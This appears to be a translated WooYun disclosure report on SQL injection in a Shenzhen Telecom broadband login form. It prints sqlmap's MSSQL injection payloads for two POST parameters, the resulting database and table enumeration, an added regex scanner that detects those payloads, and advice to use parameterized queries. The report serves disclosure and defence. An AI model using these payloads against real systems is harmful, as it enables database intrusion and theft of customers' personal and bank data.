
Vulnerability Summary

Defect ID: wooyun-2016-0191945

Title: A China Telecom site in one city has a vulnerability (leaks large amounts of users' personal information, order information, bank card information, etc.)

Related vendor: cncert National Internet Emergency Center

Author: 路人甲

Submitted: 2016-04-03 15:00

Fixed: 2016-05-21 14:10

Published: 2016-05-21 14:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2016-04-03: Details notified to the vendor, awaiting vendor handling
2016-04-06: Vendor has confirmed; details disclosed to the vendor only
2016-04-16: Details disclosed to core white hats and experts in related fields
2016-04-26: Details disclosed to ordinary white hats
2016-05-06: Details disclosed to intern white hats
2016-05-21: Details disclosed to the public

Brief description:

Large amounts of sensitive information are leaked, including accounts, ID card numbers, personal information, bank information, order information, enterprise information, and more.

Detailed description:

Shenzhen Telecom Broadband Service Center
Multiple injection points
Injection point:

http://**.**.**.**/up/?login=yes (POST)
name=111&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF


Both name and zjid are injectable.

sqlmap identified the following injection points with a total of 155 HTTP(s) requests:
---
Place: POST
Parameter: zjid
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: name=111&zjid=-1221' OR 8367=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8367=8367) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113))) AND 'BQDy'='BQDy&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
Type: UNION query
Title: Generic UNION query (NULL) - 51 columns
Payload: name=111&zjid=2222' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+CHAR(66)+CHAR(70)+CHAR(112)+CHAR(72)+CHAR(120)+CHAR(104)+CHAR(89)+CHAR(90)+CHAR(71)+CHAR(88)+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &Submit=%B5%C7%C2%BC%B2%E9%D1%AF
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: name=111&zjid=2222'; WAITFOR DELAY '0:0:5'--&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: name=111&zjid=2222' WAITFOR DELAY '0:0:5'--&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
Place: POST
Parameter: name
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: name=-6638' OR 3817=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (3817=3817) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113))) AND 'bWIg'='bWIg&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
Type: UNION query
Title: Generic UNION query (NULL) - 51 columns
Payload: name=111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+CHAR(116)+CHAR(71)+CHAR(81)+CHAR(65)+CHAR(104)+CHAR(103)+CHAR(105)+CHAR(86)+CHAR(110)+CHAR(86)+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: name=111'; WAITFOR DELAY '0:0:5'--&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: name=111' WAITFOR DELAY '0:0:5'--&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: name, type: Single quoted string (default)
[1] place: POST, parameter: zjid, type: Single quoted string
[q] Quit
> 0
[04:16:35] [INFO] testing Microsoft SQL Server
[04:16:35] [INFO] confirming Microsoft SQL Server
[04:16:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2008
[04:16:38] [INFO] fetching current user
current user: 'hds0270595'
[04:16:39] [INFO] fetching current database
current database: 'hds0270595_db'
[04:16:40] [INFO] testing if current user is DBA
current user is DBA: False
database management system users [2]:
[*] hds0270595
[*] sa_hds027adm
available databases [3]:
[*] hds0270595_db
[*] master
[*] tempdb
Database: hds0270595_db
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| dbo.dingdan | 77035 | orders
| dbo.dxyonghu | 40942 | telecom users
| dbo.tvdingdan | 18960 | TV orders
| dbo.xsdingdan | 15531 | student orders
| dbo.dkjl | 13307 | payment records
| dbo.quyu | 8813 | regions
| dbo.cdma | 7063 | cdma
| dbo.tvyonghu | 5844 | TV users
| dbo.qydingdan | 1721 | enterprise orders
| dbo.zhangbu | 1080 | ledger
| dbo.zhdingdan | 1043 | ? orders
| dbo.yybb | 1031 |
| dbo.xydingdan | 943 | credit orders?
| dbo.rizi | 908 | days
| dbo.bankmx | 771 | bank details
| dbo.telbook | 605 | phone book
| dbo.caigou | 210 | purchasing
| dbo.mingxi | 174 | details
| dbo.dxtaocan | 128 | telecom plans
| dbo.wcdma | 87 | wcdma
| dbo.taocan | 78 | plans
| dbo.tvtaocan | 64 | TV plans
| dbo.yuangong | 48 | employees
| dbo.chanpin | 43 |
| dbo.dxwapchanping | 33 |
| dbo.dxwapchanping | 33 |
| dbo.caidan | 32 |
| dbo.tvdz | 21 |
| dbo.tvwapchanping | 13 |
| dbo.tvwapchanping | 13 |
| dbo.modem | 10 |
| dbo.dls | 4 | agents?
| dbo.ywqx | 4 |
| dbo.zu_yuangong | 3 | group employees?
| dbo.config | 1 |
+-------------------+---------+


Screenshots: 101.jpg through 111.jpg


Proof of vulnerability:

As above.

Fix recommendation:

Fix by filtering input.
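As an added detection example (not part of the original report), the following Python scanner URL-decodes a GBK-encoded form body and flags the Microsoft SQL Server injection techniques sqlmap enumerated above; it runs over constructed sample bodies modelled on those payloads, not on captured traffic.

```python
import re
from urllib.parse import unquote_to_bytes

# Patterns for the MSSQL techniques sqlmap reported above: error-based CONVERT,
# UNION padded with NULLs, stacked / time-based WAITFOR, CHAR()+CHAR() string
# building, and a quote followed by a comment or statement terminator.
SIGNATURES = {
    "error_based_convert": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "union_null_columns": re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I),
    "time_based_waitfor": re.compile(r"WAITFOR\s+DELAY", re.I),
    "char_concat": re.compile(r"CHAR\s*\(\s*\d+\s*\)\s*\+\s*CHAR\s*\(", re.I),
    "quote_then_comment": re.compile(r"'.*(--|;)", re.S),
}

def parse_form(body: str, charset: str = "gbk") -> dict:
    """Split a form-urlencoded body into {field: value}. Values are
    percent-decoded to bytes, then decoded with the form's charset: the target
    posted GBK, so Submit=%B5%C7%C2%BC%B2%E9%D1%AF is just the button label.
    '+' stays literal because the samples are in sqlmap's display form."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[key] = unquote_to_bytes(value).decode(charset, errors="replace")
    return fields

def inspect_body(body: str) -> dict:
    """Return {parameter: [matched signature names]}; empty means not flagged."""
    findings = {}
    for name, value in parse_form(body).items():
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings

# Constructed sample POST bodies modelled on the sqlmap payloads above (not
# captured traffic): one benign login followed by three injection attempts.
SAMPLE_BODIES = [
    "name=111&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF",
    "name=111&zjid=2222'; WAITFOR DELAY '0:0:5'--&Submit=%B5%C7%C2%BC%B2%E9%D1%AF",
    "name=111' UNION ALL SELECT NULL,NULL,NULL-- &zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF",
    "name=-1' OR 1=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(113))) AND 'a'='a"
    "&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF",
]

def scan(bodies=SAMPLE_BODIES) -> list:
    # Inspect each body in order; the result list lines up with the input.
    return [inspect_body(b) for b in bodies]

if __name__ == "__main__":
    for body, result in zip(SAMPLE_BODIES, scan()):
        print("FLAGGED" if result else "clean", result or "", "<-", body[:70])
```

Pattern filtering of this kind is a detection aid and a stopgap, since new encodings or keyword variants will slip past it; the durable fix for the name and zjid parameters is to use parameterized queries in the ASP/ASP.NET login handler so the DBMS never parses user input as SQL.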

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-04-06 14:05

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to China Telecom Group, which will coordinate handling with the website's management department.

Latest status:

None yet